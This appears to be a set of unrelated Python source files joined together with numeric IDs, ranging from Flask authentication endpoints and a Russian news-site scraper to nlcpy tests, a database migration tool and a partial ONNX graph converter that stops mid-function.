    elif ion == 'Mg':
        ax2.set_ylabel(r'$\mathrm{Potential\/vs.\/Mg/Mg^{2+}\/(V)}$', size=28)
    elif ion == 'Al':
        ax2.set_ylabel(r'$\mathrm{Potential\/vs.\/Al/Al^{3+}\/(V)}$', size=28)

    plt.savefig('{}_hull.{}'.format(ion, fmt), transparent=True)

    return capacity  # In mAh/g
11569370
from build.management.commands.export_publications import Command as ExportPublications


class Command(ExportPublications):
    pass
11569375
from django import forms


class ShellForm(forms.Form):
    code = forms.CharField(
        required=False,
        widget=forms.Textarea(attrs={'class': 'codearea'}),
    )
    error_css_class = 'error'
11569379
from citrination_client.data import DatasetVersion


def test_can_crud_number():
    """
    Tests that full get/set/delete functionality is available for the
    number property
    """
    d = DatasetVersion(1)
    number = 2
    # use == rather than `is`: identity comparison on ints only works
    # by accident of small-int interning
    assert d.number == 1
    d.number = number
    assert d.number == number
    del d.number
    assert d.number is None
11569380
from .convert import (config_to_classifier, classifier_to_pipeline, obtain_classifier,
                      runhistory_to_trajectory, setups_to_configspace,
                      modeltype_to_classifier, scale_configspace_to_log)
from .connect import (task_counts, obtain_runhistory_and_configspace,
                      cache_runhistory_configspace)
from .filesystem import obtain_marginal_contributions
from .dictutils import rank_dict, sum_dict_values, divide_dict_values
from .misc import get_time, fixed_parameters_to_suffix, do_run, name_mapping
from .plot import (to_csv_file, to_csv_unpivot, obtain_performance_curves,
                   plot_task, boxplot_traces, average_rank)
from .priors import obtain_priors, get_kde_paramgrid, rv_discrete_wrapper
11569392
from typing import Dict

from flask import request
from flask_accepts import accepts, responds
from flask_restx import Namespace, Resource
from werkzeug.exceptions import BadRequest, Unauthorized
from werkzeug.security import check_password_hash

from .models import Token
from .schema import TokenSchema, UserSchema
from .service import create_user, find_user_by_email, generate_token

api = Namespace("Auth", description="Getting a token")


@api.route("/get_token")
class AuthTokenResource(Resource):
    """Auth"""

    @accepts(schema=UserSchema, api=api)
    @responds(schema=TokenSchema)
    @api.doc(responses={401: 'check login data'})
    def post(self) -> Token:
        """Get token by user login data"""
        obtained = request.parsed_obj
        email = obtained['email']
        password = obtained['password']
        user = find_user_by_email(email)
        if not user or not check_password_hash(user.password, password):
            raise Unauthorized("check login data")
        token = generate_token(user.id)
        return Token(token_value=token)


@api.route("/signup")
class RegisterResource(Resource):
    """Registration"""

    @accepts(schema=UserSchema, api=api)
    @api.doc(responses={200: 'registration successful'})
    @api.doc(responses={400: 'user already exists'})
    def post(self) -> Dict[str, str]:
        """User registration"""
        obtained = request.parsed_obj
        email = obtained['email']
        password = obtained['password']
        user = find_user_by_email(email)
        if not user:
            create_user(email, password=password)
        else:
            raise BadRequest("user already exists")
        return {"message": "registration successful"}
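A client-side sketch of the two endpoints. The host, port, and the URL prefix under which this namespace is mounted are assumptions; adjust them to however the app registers its Api:

import requests

creds = {"email": "user@example.com", "password": "secret"}
requests.post("http://localhost:5000/auth/signup", json=creds)
resp = requests.post("http://localhost:5000/auth/get_token", json=creds)
print(resp.json())  # e.g. {"token_value": "..."}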
11569403
import os
import sys
import copy
import logging

from checker import *
from .ofp import OfpBase
from .utils import create_section_name, get_attrs_without_len

# YAML:
# - min_rate:
#     rate: 0

SCE_PROPERTIES = "properties"


class OfpQueuePropCreator(OfpBase):

    @classmethod
    def create(cls, test_case_obj, dp, ofproto, ofp_parser, params):
        # create section name: OFPQueueProp...
        p_classes = {}
        for p in ofp_parser.OFPQueueProp._QUEUE_PROP_PROPERTIES.values():
            key = create_section_name(p.__name__, "OFPQueueProp")
            p_classes[key] = p

        # create properties.
        properties = []
        for p in params:
            for p_type, p_val in p.items():
                p_obj = p_classes[p_type](**p_val)
                p_obj._set_targets(get_attrs_without_len(p_obj))
                properties.append(p_obj)

        return properties
11569444
def minion_game(string):
    con, vow, l = "bcdfghjklmnpqrstvwxyz", "aeiou", len(string)
    p1, p2 = {"name": "Stuart", "score": 0}, {"name": "Kevin", "score": 0}
    for i, char in enumerate(string.lower()):
        if char in con:
            p1["score"] += l - i
        elif char in vow:
            p2["score"] += l - i
    if p1["score"] == p2["score"]:
        print("Draw")
    else:
        winner = p1 if p1["score"] > p2["score"] else p2
        print("{} {}".format(winner["name"], winner["score"]))
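A worked example: a substring scores its starting index's remaining length, so in "banana" Stuart owns the substrings starting at consonants b(0), n(2), n(4) for 6 + 4 + 2 = 12 points, while Kevin owns the ones starting at vowels a(1), a(3), a(5) for 5 + 3 + 1 = 9:

minion_game("BANANA")  # prints: Stuart 12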
11569455
import unittest

import numpy

from nlcpy import testing

nan_dtypes = (
    numpy.float32,
    numpy.float64,
    numpy.complex64,
    numpy.complex128,
)

shapes = (
    (4,),
    (3, 4),
    (2, 3, 4),
)


@testing.parameterize(*(
    testing.product({
        'shape': shapes,
    })
))
class TestPtp(unittest.TestCase):

    # ndarray methods
    @testing.for_dtypes(['i', 'q', 'f', 'd', 'F', 'D'])
    @testing.numpy_nlcpy_array_equal()
    def test_case_mem_01(self, xp, dtype):
        a = testing.shaped_random(self.shape, xp, dtype)
        a = xp.asarray(a)
        return a.ptp()

    @testing.for_dtypes(['i', 'q', 'f', 'd', 'F', 'D'])
    @testing.numpy_nlcpy_array_equal()
    def test_case_mem_02(self, xp, dtype):
        a = testing.shaped_random(self.shape, xp, dtype)
        a = xp.asarray(a)
        return a.ptp(axis=0)

    @testing.numpy_nlcpy_array_equal()
    def test_me_case_mem_1(self, xp):
        x = xp.array([[4, 9, 2, 10], [6, 9, 7, 12]])
        return x.ptp(axis=1)

    @testing.numpy_nlcpy_array_equal()
    def test_me_case_mem_2(self, xp):
        x = xp.array([[4, 9, 2, 10], [6, 9, 7, 12]])
        return x.ptp(axis=0)

    @testing.numpy_nlcpy_array_equal()
    def test_me_case_mem_3(self, xp):
        x = xp.array([[1, 127], [0, 127], [-1, 127], [-2, 127]], dtype=xp.int32)
        return x.ptp(axis=1)
11569491
import requests
import lxml
from lxml import etree
from lxml.html import fromstring

root = etree.parse(r'C:\Users\Kiril\PycharmProjects\Diploma2020\data\corpus.xml')
root = root.getroot()
corpus = etree.SubElement(root, "corpus")

source_examples = dict()
text_num = dict()
status_codes = dict()
failed_elements = dict()
count = 1214
download_version = "v1"
user_agent = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 '
              '(KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36')
web_archive_page = "http://web.archive.org/web/"

for element in root[1][1214:]:
    id = element[0].text
    text = element[1].text
    agency = element[2].text
    link = element[4].text
    date = element[5].text
    source_examples[agency] = element[4].text
    text_num[agency] = text_num.get(agency, 0) + 1
    count += 1
    processed_status = "Unknown agency '" + agency + "'"
    print("[" + str(count) + "]: id =", id, ", agency = ", agency,
          ", link = ", link, ", processed_status =", end=" ")
    try:
        with open("download/" + download_version + "/" + id + ".txt", 'w',
                  encoding="utf-8") as outputFile:
            if agency == "РБК":
                rubrics = "none"
                # requests expects a dict (or CookieJar) for cookies, not ""
                response = requests.get(web_archive_page + link, cookies={},
                                        headers={'User-Agent': user_agent})
                html = lxml.html.fromstring(response.text)
                elements_with_article = html.find_class("_ga1_on_ visible")
                if not elements_with_article:
                    elements_with_article = html.find_class("article__text")
                    rubrics = str([elm.text.strip()
                                   for elm in html.find_class("article__tags__link")])
                for block in elements_with_article[0]:
                    if block.tag != 'p':
                        continue
                    print(block.text_content(), file=outputFile, end="\n\n")
                processed_status = "Downloaded, rubrics: " + rubrics
            elif agency == "Лента.ру":
                rubrics = "none"
                response = requests.get(link)
                html = lxml.html.fromstring(response.text)
                elements_with_article = html.find_class("js-topic__text")
                for block in elements_with_article[0]:
                    if block.tag != 'p':
                        continue
                    print(block.text_content(), file=outputFile, end="\n\n")
                processed_status = "Downloaded, rubrics: " + rubrics
            elif agency == "Российская газета":
                response = requests.get(link)
                html = lxml.html.fromstring(response.text)
                text_block = html.find_class("b-material-wrapper__text")
                for block in text_block[0]:
                    if block.tag != 'p':
                        continue
                    print(block.text_content(), file=outputFile, end="\n\n")
                rubrics = str([elm.text_content() for elm in
                               html.find_class("b-material-wrapper__rubric")[0]
                                   .find_class("b-link")])
                processed_status = "Downloaded, rubrics: " + rubrics
            elif agency == "КоммерсантЪ":
                response = requests.get(link.strip())
                html = lxml.html.fromstring(response.text)
                text_block = html.find_class("article_text_wrapper")
                for block in text_block[0][1:]:
                    if block.tag != 'p':
                        continue
                    print(block.text_content(), file=outputFile, end="\n\n")
                rubrics = str([elm.text_content() for elm in
                               html.find_class("doc_footer__subs_link")])
                processed_status = "Downloaded, rubrics: " + rubrics
            elif agency == "РИА Новости":
                response = requests.get(link)
                html = lxml.html.fromstring(response.text)
                print(html.find_class("article__announce-text")[0].text_content(),
                      file=outputFile, end="\n\n")
                text_block = html.find_class("article__text")
                for block in text_block:
                    if block.text_content() == "":
                        continue
                    print(block.text_content(), file=outputFile, end="\n\n")
                rubrics = str([elm.text_content() for elm in
                               html.find_class("article__tags-item")])
                processed_status = "Downloaded, rubrics: " + rubrics
            elif agency == "ИноСМИ":
                response = requests.get(link)
                html = lxml.html.fromstring(response.text)
                text = etree.tounicode(html.find_class("article-body")[0][0]) \
                    .replace("<p>", "").replace("</p>", "")
                for block in text.split("<br/><br/>"):
                    print(block, file=outputFile, end="\n\n")
                rubrics = str([elm.text_content() for elm in
                               html.find_class("article-header__story")])
                processed_status = "Downloaded, rubrics: " + rubrics
            elif agency == "Фонтанка.ру":
                response = requests.get(link)
                html = lxml.html.fromstring(response.text)
                text_block = html.find_class("D5cr")
                for block in text_block:
                    for sub_block in block:
                        if sub_block.tag != 'p':
                            continue
                        print(sub_block.text_content(), file=outputFile, end="\n\n")
                rubrics = str([elm.text_content() for elm in html.find_class("GDhr")])
                processed_status = "Downloaded, rubrics: " + rubrics
            else:
                print("Failed", file=outputFile)
    except Exception as err:
        processed_status = "Failed — " + str(err)
    print(processed_status)

print("Completed!")
print()
print("Number of texts per agency, with one example link:")
for i in source_examples:
    print(i, source_examples[i], "size: ", text_num[i])
print()
print("Link status codes:")
for i in status_codes:
    print("'", i, "' — ", status_codes[i])
11569509
import logging

from scanner import barcode_reader

# simple usage - in python 3
if __name__ == '__main__':
    try:
        while True:
            upcnumber = barcode_reader()
            print(upcnumber)
    except KeyboardInterrupt:
        logging.debug('Keyboard interrupt')
    except Exception as err:
        logging.error(err)
11569546
from collections import OrderedDict

from .tensor import weighted_sum


def average_state_dicts(dicts, weights=None):
    if not weights:
        weights = (1 / len(dicts),) * len(dicts)
    averaged = OrderedDict()
    for k in dicts[0]:
        averaged[k] = weighted_sum([d[k] for d in dicts], weights)
    return averaged
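A usage sketch, assuming the project's weighted_sum(values, weights) returns the elementwise sum of values[i] * weights[i]; the torch tensors are only illustrative, any type weighted_sum supports would do:

import torch

sd_a = {"w": torch.tensor([0.0, 2.0])}
sd_b = {"w": torch.tensor([4.0, 2.0])}
avg = average_state_dicts([sd_a, sd_b])                 # uniform -> {"w": tensor([2., 2.])}
avg = average_state_dicts([sd_a, sd_b], (0.25, 0.75))   # custom weights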
11569554
import lime
import lime.lime_tabular
import matplotlib as plt

from django.core.management.base import BaseCommand
from sklearn.externals import joblib

from src.core.core import get_encoded_logs
from src.encoding.common import retrieve_proper_encoder
from src.jobs.models import Job


class Command(BaseCommand):
    help = 'tries to deliver an explanation of a random prediction of the trained model'

    def handle(self, *args, **kwargs):
        # get model
        TARGET_MODEL = 5
        job = Job.objects.filter(pk=TARGET_MODEL)[0]
        model = joblib.load(job.predictive_model.model_path)

        # load data
        training_df, test_df = get_encoded_logs(job)

        # get random point in evaluation set
        EXPLANATION_TARGET = 3

        # get the actual explanation
        explainer = lime.lime_tabular.LimeTabularExplainer(
            training_df.drop(['trace_id', 'label'], 1).as_matrix(),
            feature_names=list(training_df.drop(['trace_id', 'label'], 1).columns.values),
            categorical_features=[i for i in range(len(
                list(training_df.drop(['trace_id', 'label'], 1).columns.values)))],
            verbose=True,
            mode='classification',
        )
        exp = explainer.explain_instance(
            test_df.drop(['trace_id', 'label'], 1).iloc[EXPLANATION_TARGET],
            # TODO: probably the opposite would be way less computationally intensive
            model[0].predict_proba,
            num_features=5
        )
        exp.as_list()

        # show plot
        # exp.show_in_notebook(show_table=True)
        # exp.as_pyplot_figure().show()
        exp.save_to_file('oi.html')

        print('done')
11569558
from PyQt5.QtWidgets import QApplication

from client.client_gui import ClientWindow

if __name__ == '__main__':
    import sys

    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0].split('/')[-1]} "
              f"<file name> <host address> <host port> <RTP port>")
        exit(-1)
    file_name, host_address, host_port, rtp_port = sys.argv[1:5]
    try:
        host_port = int(host_port)
        rtp_port = int(rtp_port)
    except ValueError:
        raise ValueError('port values should be integers')

    app = QApplication(sys.argv)
    client = ClientWindow(file_name, host_address, host_port, rtp_port)
    client.resize(400, 300)
    client.show()
    sys.exit(app.exec_())
11569567
from .__about__ import (
    __license__,
    __copyright__,
    __url__,
    __contributors__,
    __version__,
    __doc__,
)

# user-facing classes are exposed via __all__
from .data_types import *
from .logging import make_logger
from .runtime import *
from .wiring import *

# standard library
from . import lib
11569582
import logging
import glob
import os
import os.path
import sys
import re
import subprocess
import datetime
import imp
import warnings
import traceback
import importlib
import inspect

import sqlparse
import click


log = logging.getLogger('mschematool')


DEFAULT_CONFIG_MODULE_NAME = 'mschematool_config'


# Ignore warnings about installation of optimized versions
# of packages - irrelevant for the use case.
warnings.filterwarnings('ignore')


### Utility functions

def _simplify_whitespace(s):
    return b' '.join(s.split())


def _assert_values_exist(d, *keys):
    for k in keys:
        assert d.get(k), 'No required value %r specified' % k


def _import_class(cls_path):
    modname, _, clsname = cls_path.rpartition('.')
    mod = importlib.import_module(modname)
    return getattr(mod, clsname)


### Loading and processing configuration

class Config(object):

    def __init__(self, verbose, config_path):
        self.verbose = verbose
        self.config_path = config_path
        self._module = None

    def _setup_logging(self):
        global log
        log.setLevel(logging.DEBUG)

        formatter = logging.Formatter('%(asctime)-15s %(message)s')

        console_handler = logging.StreamHandler(sys.stderr)
        console_handler.setFormatter(formatter)
        console_handler.setLevel(logging.DEBUG)
        if self.verbose:
            log.addHandler(console_handler)

        if hasattr(self.module, 'LOG_FILE'):
            file_handler = logging.FileHandler(self.module.LOG_FILE)
            file_handler.setLevel(logging.DEBUG)
            file_handler.setFormatter(formatter)
            log.addHandler(file_handler)

    def _load_config(self):
        if self._module is not None:
            return
        if not os.path.exists(self.config_path):
            msg = 'Configuration module %r does not exist' % self.config_path
            sys.stderr.write(msg + '\n')
            log.critical(msg)
            raise Exception(msg)
        try:
            self._module = imp.load_source('mschematool_config', self.config_path)
        except ImportError:
            msg = 'Cannot import mschematool config module'
            sys.stderr.write(msg + '\n')
            log.critical(msg)
            raise
        self._setup_logging()

    @property
    def module(self):
        self._load_config()
        return self._module


def _sqlfile_to_statements(sql):
    """
    Takes a SQL string containing 0 or more statements and returns a
    list of individual statements as strings. Comments and empty
    statements are ignored.
    """
    statements = (sqlparse.format(stmt, strip_comments=True).strip()
                  for stmt in sqlparse.split(sql))
    return [stmt for stmt in statements if stmt]


#### Migrations repositories

class MigrationsRepository(object):
    """A repository of migrations is a place where all available migrations
    are stored (for example a directory with migrations as files).
    """

    def get_migrations(self, exclude=None):
        """Return a sorted list of all migrations. In a common case a
        migration will be a filename, without a leading directory part.

        :param exclude: a list or set of migrations to exclude from
            the result
        """
        raise NotImplementedError()

    def generate_migration_name(self, name, suffix):
        """Returns a name of a new migration. It will usually be a filename
        with a valid and unique name.

        :param name: human-readable name of a migration
        :param suffix: file suffix (extension) - eg. 'sql'
        """
        return os.path.join(self.dir, 'm{datestr}_{name}.{suffix}'.format(
            datestr=datetime.datetime.utcnow().strftime('%Y%m%d%H%M%S'),
            name=name.replace(' ', '_'),
            suffix=suffix))

    def migration_type(self, migration):
        """Recognize migration type based on a migration (usually a filename).

        :return: 'native' or 'py'
        """
        if migration.endswith('.py'):
            return 'py'
        return 'native'


class DirRepository(MigrationsRepository):
    """:class:`MigrationsRepository` implementation with migrations being
    files inside a directory ``dir``.

    Example filenames:

    - m20140615132455_init.sql
    - m20140615135414_insert3.py

    :param migration_patterns: a list of glob expressions for selecting
        valid migration filenames, relative to ``dir``.
    """

    def __init__(self, dir, migration_patterns):
        self.dir = dir
        self.migration_patterns = migration_patterns

    def _get_all_filenames(self):
        filenames = []
        for pattern in self.migration_patterns:
            p_filenames = glob.glob(os.path.join(self.dir, pattern))
            filenames.extend(p_filenames)
        # lexicographical ordering
        filenames.sort()
        return filenames

    def get_migrations(self, exclude=None):
        filenames = self._get_all_filenames()
        filenames = [os.path.split(fn)[1] for fn in filenames]
        if exclude:
            filenames = set(filenames) - set(exclude)
        filenames = sorted(filenames)
        return filenames


#### Database-independent interface for migration-related operations

class MigrationsExecutor(object):
    """A class that executes migrations and stores information about
    execution. It will usually store this information inside a database
    for which migrations are tracked.

    :attr:`MigrationsExecutor.engine` is an engine name that can be
    referenced from a config module.

    :attr:`MigrationsExecutor.filename_extensions` is a list of filename
    extensions specifying files which execution is supported, in addition
    to 'py' and the engine name.

    :param db_config: a dictionary with configuration for a single dbnick.
    :param repository: :class:`MigrationsRepository` implementation.
    """

    engine = 'unknown'
    filename_extensions = []

    def __init__(self, db_config, repository):
        self.db_config = db_config
        self.repository = repository

    @classmethod
    def supported_filename_globs(cls):
        def glob_from_ext(ext):
            return '*.%s' % ext
        default_globs = [glob_from_ext('py'), glob_from_ext(cls.engine)]
        custom_globs = [glob_from_ext(ext) for ext in cls.filename_extensions]
        return default_globs + custom_globs

    def initialize(self):
        """Initialize resources needed for tracking migrations.

        It will usually create a database table for storing information
        about executed migrations.
        """
        raise NotImplementedError()

    def fetch_executed_migrations(self):
        """Return a list of executed migrations (filenames).
        """
        raise NotImplementedError()

    def execute_python_migration(self, migration, module):
        """Execute a migration written as Python code, and store
        information about it.

        :param migration: migration (filename) to be executed
        :param module: Python module imported from the migration
        """
        raise NotImplementedError()

    def execute_native_migration(self, migration):
        """Execute a migration in a format native to the DB (SQL file,
        CQL file etc.), and store information about it.

        :param migration: migration (filename) to be executed
        """
        raise NotImplementedError()

    def _call_migrate(self, module, connection_param):
        """Subclasses should call this method instead of `module.migrate`
        directly, to support the `db_config` optional argument.
        """
        args = [connection_param]
        spec = inspect.getargspec(module.migrate)
        if len(spec.args) == 2:
            args.append(self.db_config)
        return module.migrate(*args)

    def execute_migration(self, migration_file_relative):
        """This recognizes the migration type and executes either
        :method:`execute_python_migration` or
        :method:`execute_native_migration`.
        """
        migration_file = os.path.join(self.db_config['migrations_dir'],
                                      migration_file_relative)
        m_type = self.repository.migration_type(migration_file)
        if m_type == 'native':
            return self.execute_native_migration(migration_file)
        if m_type == 'py':
            module = imp.load_source('migration_module', migration_file)
            return self.execute_python_migration(migration_file, module)
        assert False, 'Unknown migration type %s' % migration_file


ENGINE_TO_IMPL = {
    'postgres': 'mschematool.executors.postgres.PostgresMigrations',
    'cassandra': 'mschematool.executors.cassandradb.CassandraMigrations',
    'sqlite3': 'mschematool.executors.sqlite3db.Sqlite3Migrations',
}


### Integrating all the classes

class MSchemaTool(object):

    def __init__(self, config, dbnick):
        self.config = config
        self.dbnick = dbnick

        if dbnick not in config.module.DATABASES:
            raise click.ClickException(
                'Not found in DATABASES in config: %s, available: %s' %
                (dbnick, ', '.join(config.module.DATABASES.keys())))
        self.db_config = config.module.DATABASES[dbnick]

        if 'engine' not in self.db_config or self.db_config['engine'] not in ENGINE_TO_IMPL:
            raise click.ClickException(
                'Unknown or invalid engine specified for the database %s, '
                'choose one of %s' % (dbnick, ENGINE_TO_IMPL.keys()))
        engine_cls = _import_class(ENGINE_TO_IMPL[self.db_config['engine']])

        self.repository = DirRepository(self.db_config['migrations_dir'],
                                        engine_cls.supported_filename_globs())
        self.migrations = engine_cls(self.db_config, self.repository)

    def not_executed_migration_files(self):
        return self.repository.get_migrations(
            exclude=self.migrations.fetch_executed_migrations())

    def execute_after_sync(self):
        after_sync = self.db_config.get('after_sync')
        if not after_sync:
            return
        msg = 'Executing after_sync command %r' % after_sync
        log.info(msg)
        click.echo(msg)
        os.system(after_sync)
11569615
import unittest
from types import SimpleNamespace


class TestCaseWithState(unittest.TestCase):
    state = SimpleNamespace()
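Usage sketch: `state` is a class attribute, so values stashed on it in one test survive into later tests of the same subclass (unittest runs a class's tests in alphabetical order, hence the numbered names):

class TestPipeline(TestCaseWithState):
    def test_1_build(self):
        self.state.artifact = "built"

    def test_2_use(self):
        self.assertEqual(self.state.artifact, "built")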
11569672
def task_checker():
    return {'actions': ["pyflakes sample.py"],
            'file_dep': ["sample.py"]}
11569723
import json
import os
import csv
import io
import shutil


def parseSong(song, extremeJSON):
    if song['name_translation'] == '':
        songName = song['name']
    else:
        songName = song['name_translation']
    for root, dirnames, filenames in os.walk('Songs'):
        if songName in dirnames:
            if songName + '.png' in os.listdir(root + "\\" + songName):
                shutil.copyfile(root + '\\' + songName + '\\' + songName + '.png',
                                'Extreme Banners/ex_' + songName + '.png')
                for item in extremeJSON:
                    if (song['name'] == item['name']
                            and song['name_translation'] == item['name_translation']):
                        item['jacket'] = 'ex_' + songName + '.png'
                        item['folder'] = root.split('\\')[1]
                return
    print("NO MATCH: " + songName)


def main():
    with io.open('../src/songs/extreme.json', encoding='utf-8') as extremeJSONFile:
        extremeJSON = json.load(extremeJSONFile)
    for song in extremeJSON:
        parseSong(song, extremeJSON)
    with io.open('extreme_out.json', encoding='utf-8', mode='w') as extremeOutJSONFile:
        json.dump(extremeJSON, extremeOutJSONFile)


if __name__ == "__main__":
    main()
11569747
import traceback
import sys
import logging

from onnx import numpy_helper

import util
from pb_wrapper import OnnxNode
from type_converter import dtype_onnx2tl


def new_opname(optype):
    if not hasattr(new_opname, 'opname_count'):
        new_opname.opname_count = {}
    if optype in new_opname.opname_count:
        new_opname.opname_count[optype] += 1
    else:
        new_opname.opname_count[optype] = 0
    return optype + str(new_opname.opname_count[optype])


# TODO: give it a class
def error(msg):
    try:
        raise Exception(msg)
    except Exception as e:
        print(e)
        traceback.print_stack()
    # exit(1)


def handle_pads(node, tensor_dict):
    if 'pads' not in node.attrs and node.attrs['auto_pad'] == 'NOTSET':
        error("'%s' for node '%s' must have a 'pads' attribute or a "
              "non-NOTSET 'auto_pad'" % (node.op_type, node.name))
    if 'pads' in node.attrs and 'auto_pad' in node.attrs \
            and node.attrs['auto_pad'] != 'NOTSET':
        error("'%s' for node '%s' cannot use 'pads' and non-NOTSET 'auto_pad' "
              "simultaneously" % (node.op_type, node.name))
    if 'pads' in node.attrs:
        pad_shape = node.attrs['pads']
        node.attrs['auto_pad'] = 'NOTSET'
    else:
        pad_shape = [0 for i in range(len(node.attrs['strides']) * 2)]
    return pad_shape


def find_shape_in_tensor_dict(tensor_dict, name):
    value_infos = tensor_dict['__value_infos']
    if name in value_infos:
        shape = list(
            d.dim_value if (d.dim_value > 0 and d.dim_param == "") else None
            for d in value_infos[name].type.tensor_type.shape.dim)
        return shape
    if name in tensor_dict and tensor_dict[name]['dims'] is not None \
            and tensor_dict[name]['dims'][0] is not None:
        return tensor_dict[name]['dims']
    return None


def tensor_proto_to_tensor(tensor_proto):
    def tensor2list(onnx_tensor):
        # Use the onnx.numpy_helper because the data may be raw
        return numpy_helper.to_array(onnx_tensor).flatten().tolist()

    tp = tensor_proto
    tensor = (tp.name, {'name': tp.name,
                        'dtype': dtype_onnx2tl(tp.name, tp.data_type),
                        'dims': list(d for d in tp.dims),
                        'data': tensor2list(tp)})
    return tensor


def new_create_op(tensor):
    data = [0] if tensor['data'] is None else tensor['data']
    op = {'name': new_opname("create"),
          'optype': 'create',
          'tensors_in': [],
          'tensors_out': [{'arg_name': 'dst', 'name': tensor['name']}],
          'params': [{'arg_name': 'dtype', 'value': tensor['dtype']},
                     {'arg_name': 'dims', 'value': tensor['dims']},
                     {'arg_name': 'data', 'value': data},
                     {'arg_name': 'ran', 'value': [0, 0]},
                     {'arg_name': 'from_file', 'value': False}]}
    return op


def Add(node, tensor_dict):
    assert node.op_type == 'Add'
    tensor_dict[node.outputs[0]] = {'name': node.outputs[0],
                                    'dtype': tensor_dict[node.inputs[0]]['dtype'],
                                    'dims': None,  # TODO: do shape inference
                                    'data': None}
    op = {'name': new_opname('elew'),
          'optype': 'elew',
          'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]},
                         {'arg_name': 'src2', 'name': node.inputs[1]}],
          'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}],
          'params': [{'arg_name': 'elew_op', 'value': 'TL_ADD'}]}
    return [op]


def ArgMax(node, tensor_dict):
    assert node.op_type == 'ArgMax'
    if 'keepdims' in node.attrs and node.attrs['keepdims'] == 0:
        error("'%s' for node '%s' only support 'keepdims' == 1 now"
              % (node.op_type, node.name))
    opname = new_opname('maxreduce_arg')
    # use it to generate the ignored 'dst' name
    tensor_dict[node.outputs[0]] = {'name': opname + '_dst_ln_',
                                    'dtype': tensor_dict[node.inputs[0]]['dtype'],
                                    'dims': None,  # TODO: do shape inference
                                    'data': None}
    tensor_dict[node.outputs[0]] = {'name': node.outputs[0],
                                    'dtype': "TL_INT32",
                                    'dims': None,  # TODO: do shape inference
                                    'data': None}
    op = {'name': opname,
          'optype': 'maxreduce_arg',
          'tensors_in':
              [{'arg_name': 'src', 'name': node.inputs[0]}],
          'tensors_out': [{'arg_name': 'dst', 'name': opname + '_dst_ln_'},
                          {'arg_name': 'arg', 'name': node.outputs[0]}],
          'params': [{'arg_name': 'axis', 'value': node.attrs['axis']}]}
    return [op]


def AveragePool(node, tensor_dict):
    assert node.op_type == 'AveragePool'
    if len(node.attrs['kernel_shape']) != 2:
        error("'%s' for node '%s' only supports 2-d tensors now"
              % (node.op_type, node.name))
    pad_shape = handle_pads(node, tensor_dict)
    tensor_dict[node.outputs[0]] = {'name': node.outputs[0],
                                    'dtype': tensor_dict[node.inputs[0]]['dtype'],
                                    'dims': None,  # TODO: do shape inference
                                    'data': None}
    op = {'name': new_opname('avgpool2d'),
          'optype': 'avgpool2d',
          'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}],
          'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}],
          'params': [{'arg_name': 'size', 'value': node.attrs['kernel_shape']},
                     {'arg_name': 'stride', 'value': node.attrs['strides']},
                     {'arg_name': 'padding', 'value': pad_shape},
                     {'arg_name': 'autopad', 'value': node.attrs['auto_pad']}]}
    return [op]


def BatchNormalization(node, tensor_dict):
    assert node.op_type == 'BatchNormalization'
    if 'epsilon' not in node.attrs:
        epsilon = 1e-5
    else:
        epsilon = node.attrs['epsilon']
    tensor_dict[node.outputs[0]] = {'name': node.outputs[0],
                                    'dtype': tensor_dict[node.inputs[0]]['dtype'],
                                    'dims': None,  # TODO: do shape inference
                                    'data': None}
    op = {'name': new_opname('batchnorm'),
          'optype': 'batchnorm',
          'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]},
                         {'arg_name': 'scale', 'name': node.inputs[1]},
                         {'arg_name': 'offset', 'name': node.inputs[2]},
                         {'arg_name': 'mean', 'name': node.inputs[3]},
                         {'arg_name': 'var', 'name': node.inputs[4]}],
          'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}],
          'params': [{'arg_name': 'epsilon', 'value': epsilon}]}
    return [op]


def Concat(node, tensor_dict):
    assert node.op_type == 'Concat'
    if len(node.inputs) != 2:
        error("'%s' for node '%s' only supports 2 input tensors now"
              % (node.op_type, node.name))
    tensor_dict[node.outputs[0]] = {'name': node.outputs[0],
                                    'dtype': tensor_dict[node.inputs[0]]['dtype'],
                                    'dims': None,  # TODO: do shape inference
                                    'data': None}
    op = {'name': new_opname('concat'),
          'optype': 'concat',
          'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]},
                         {'arg_name': 'src2', 'name': node.inputs[1]}],
          'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}],
          'params': [{'arg_name': 'axis', 'value': node.attrs['axis']}]}
    return [op]


def Conv(node, tensor_dict):
    assert node.op_type == 'Conv'
    if len(node.attrs['strides']) != 2:
        error("'%s' for node '%s' only supports 2-d tensors now"
              % (node.op_type, node.name))
    if 'kernel_shape' not in node.attrs:
        error("'%s' for node '%s' must have a 'kernel_shape' attribute now"
              % (node.op_type, node.name))
    pad_shape = handle_pads(node, tensor_dict)
    tensor_dict[node.outputs[0]] = {'name': node.outputs[0],
                                    'dtype': tensor_dict[node.inputs[0]]['dtype'],
                                    'dims': None,  # TODO: do shape inference
                                    'data': None}
    if len(node.inputs) == 2:
        bias_name = node.name + ".bias"
        node.inputs.append(node.name + ".bias")
        src_shape = find_shape_in_tensor_dict(tensor_dict, node.inputs[0])
        # print(src_shape, file=sys.stderr)
        bias_len = src_shape[1]
        tensor_dict[bias_name] = {
            'name': bias_name,
            'dtype': tensor_dict[node.inputs[0]]['dtype'],
            'dims': [bias_len],
            'data': [0 for i in range(bias_len)]
        }
    op = {'name': new_opname('conv2d'),
          'optype': 'conv2d',
          'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]},
                         {'arg_name': 'weight', 'name': node.inputs[1]},
                         {'arg_name': 'bias', 'name':
